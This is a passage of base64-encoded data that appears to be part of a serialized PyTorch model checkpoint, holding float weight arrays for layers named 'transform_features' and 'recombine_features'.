y1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAABxYYVxYlJxY0sAS2RLZIZxZEtkSwGGcWWJaAIpUnFmdHFnUnFoWCcAAABiYXNlLmxheWVycy4yLnRyYW5zZm9ybV9mZWF0dXJlcy53ZWlnaHRxaWgFKGgGQvwEAACAAooKbPycRvkgaqhQGS6AAk3pAy6AAn1xAChYEAAAAHByb3RvY29sX3ZlcnNpb25xAU3pA1gNAAAAbGl0dGxlX2VuZGlhbnECiFgKAAAAdHlwZV9zaXplc3EDfXEEKFgFAAAAc2hvcnRxBUsCWAMAAABpbnRxBksEWAQAAABsb25ncQdLBH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